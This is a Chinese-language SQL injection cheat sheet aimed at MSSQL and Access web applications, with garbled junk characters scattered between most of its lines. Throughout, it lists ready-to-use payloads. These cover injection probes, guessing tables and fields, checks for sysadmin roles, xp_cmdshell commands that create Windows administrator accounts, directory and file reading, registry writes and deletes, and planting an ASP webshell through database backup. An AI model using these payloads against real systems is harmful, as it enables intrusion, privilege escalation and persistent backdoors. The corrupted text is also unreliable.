1.判断是否有注入;and 1=1 ;and 1=2 �lYZ@a4T�A
2.初步判断是否是mssql ;and user>0 �
krr-Z�iK
K��*N�b_|~
3.注入参数是字符'and [查询条件] and ''=' F�@��_Egi�
il���IV}8
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��`FYtiv?G
1�FD7~�S�|
5.判断数据库系统 �L^5&GcHP0
lNh=>D�Pu
;and (select count(*) from sysobjects)>0 mssql @dE�� ��3�
!8
��
wid&
;and (select count(*) from msysobjects)>0 access {m+S{�dW�p
�iO?�g�F��
K�M��pDlit
�>uyeI�&�z
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��
u]1�-h6
�h�pqHll�L
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 GFQG�(7G�9
~51ki���QW
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 _cxm}*}\#�
%;=�IM�MK�
9.(1)猜字段的ascii值(access) Imh2�~rw;�
}"&n[/��8~
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 f*|8n�$%��
u���b�zb��
(2)猜字段的ascii值(mssql) {�h�vQ<�7b
fz<|+(_>J�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E�Bj,p�k5M
d739U��hKC
10.测试权限结构(mssql) rS�F;Lp�)}
m0%iw1OsH%
/^z/]!JG:V
���LM"�W)S
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 'FPc�AW^8
45r]wT(C
�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- P�E�X26==
9&[)�(On74
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |z�!q
r�}i
Q
Qs�V�IHA
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 7G�BZA=J
b[{m>Fa+o#
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �4hsP�bUx9
/@9-!��cL
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ;�I!+�lx3[
g)Vq5en*��
;and 1=(select IS_MEMBER('db_owner'));-- Edf=?K+\!i
IL+��#ynC�
��4DQ�0�7w
+X* �F<6mZ
11.添加mssql和系统的帐户 �' D)1ka.�
K�)Df}fVOc
;exec master.dbo.sp_addlogin username;-- CU#�L *k�z
;exec master.dbo.sp_password null,username,password;-- eH�VdZ�'%x
r!=]Q�}`F�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3i�]"#�w�K
dl*_ �m3�T
;exec master.dbo.xp_cmdshell 'net user username password u|_�LR5S!j
�kz�7�v�bY
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2cs?("�8e%
e/�]�O<,�*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- c{'$=l�R "
ys�&"r�":I
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- g�^�s+C� Z
wq��:b j=j
M(;y~��|e
['51FulD�R
12.(1)遍历目录 $��?��]@_=
F9�m�2C'U�
;create table dirs(paths varchar(100), id int) Ur�_�S�
[I
jsk:fh�0~M
;insert dirs exec master.dbo.xp_dirtree 'c:\' ]6�a/0rg:t
^G�|w�8t+^
;and (select top 1 paths from dirs)>0 �v�O}q�j�w
Ap
F*�a$),
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *�a�jFZ�I�
!�7:EE,W~�
]�i�z_w`I\
q=P�
f^X�p
(2)遍历目录 652u�Z};�e
��bjM-Hd/K
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4&FN�U)�tt
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 07$/�]eO%C
�2k.��S[?)
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 cOzg/~�\1�
*fx�ep�08B
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �F`�YFo�)W
X0^zw^2�W�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 X)FL�[RO%q
_N>�wz�kJ
6obQ�9L c�
7j@^+rkr3f
13.mssql中的存储过程 ��L�F�E�p
/��`�7 I�K
xp_regenumvalues 注册表根键, 子键 E0sbU<1�1�
"_���nX5J9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 +G5'��kYzJ
4ggVj*�{�v
xp_regread 根键,子键,键值名 z�{Hz;m:*_
$?H]S]#|}.
;exec xp_regread M?E9N{t8)a
_Ct}%�-�,4
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 H��"Q�(2I
gg�rI>vaw
xp_regwrite 根键,子键, 值名, 值类型, 值 ��j�G�+�T.
R19'|��T�J
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��qJ�\X~5{
Z��7`��5x
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 8pX�f��T%]
�m��Bw�2��
xp_regdeletevalue 根键,子键,值名 1zdYBb6;j
\1=T
sU�&^
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 rER~P��\-
,3����G$`�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Zr\2BOcc.l
>�=4�sPF)�
�N�Y~ �dM\
w0�#%�A��K
14.mssql的backup创建webshell V[#6yM�U�@
��II.�<S�C
use model bq:wE�MM4s
&(�lMm���)
create table cmd(str image); 1�1i"n��R|
8&?^XcJ�*x
insert into cmd(str) values (''); �^bF�}_CSE
c��e��q�FQ
backup database model to disk='c:\l.asp'; c}YJqhk�0J
92�9#�Q#TT
xg(<oDn+\
;
qO@A1�Hq
15.mssql内置函数 60�~�v
t04
S|�l�&fb n
;and (select @@version)>0 获得Windows的版本号 � UP�\8w#~
{;U��}�:Dx
;and user_name()='dbo' 判断当前系统的连接用户是不是sa w+Ad$4Pf�"
G�"}qV%"6"
;and (select user_name())>0 爆当前系统的连接用户 �)$MS�
0[?
Jm?l59bv
v
;and (select db_name())>0 得到当前连接的数据库 i�:g�{{Uuv
OlIT|bz�kb
.�=?Sz*�3
@8|~�+y8�,
16.简洁的webshell D[�V`^C�Tu
��H(���MB5
use model #X4LLS]V�V
a a4�$'�8s
create table cmd(str image); !��&��Z*yH
�uRP
�Ff77
insert into cmd(str) values (''); O\%j56Bf��
X��
�d!C�p
backup database model to disk='g:\wwwtest\l.asp';
